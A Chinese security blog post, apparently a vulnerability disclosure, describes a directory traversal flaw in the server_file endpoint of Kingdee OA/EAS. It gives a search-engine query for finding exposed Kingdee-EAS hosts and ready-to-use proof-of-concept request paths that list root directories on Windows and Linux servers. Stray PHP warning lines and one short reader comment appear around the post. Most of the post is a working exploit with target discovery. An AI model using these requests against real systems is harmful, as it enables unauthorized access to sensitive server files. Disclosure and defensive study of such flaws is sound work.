Warning: Undefined array key "HTTP_ACCEPT_LANGUAGE" in /www/wwwroot/blog.guapiwo.top/usr/themes/joe/public/tencent_protect.php on line 40

Deprecated: strpos(): Passing null to parameter #1 ($haystack) of type string is deprecated in /www/wwwroot/blog.guapiwo.top/usr/themes/joe/public/tencent_protect.php on line 40
金蝶OA server_file 目录遍历漏洞 - 瓜皮博客_d0glun
金蝶OA server_file 目录遍历漏洞
金蝶OA server_file 目录遍历漏洞
瓜皮博客_d0glun

金蝶OA server_file 目录遍历漏洞

d0glun
2025-05-20 / 1 评论 / 12 阅读 / 正在检测是否收录...

漏洞描述
金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息
漏洞影响
1
金蝶OA
网络测绘

app="Kingdee-EAS"

漏洞复现
登录界面为
1

漏洞Poc

/appmonitor/protected/selector/server_file/files?folder=/&suffix=

# Windows服务器
appmonitor/protected/selector/server_file/files?folder=C://&suffix=

# Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=

2

0

评论 (1)

取消
  1. 头像
    6666
    Android · Google Chrome

    6666

    回复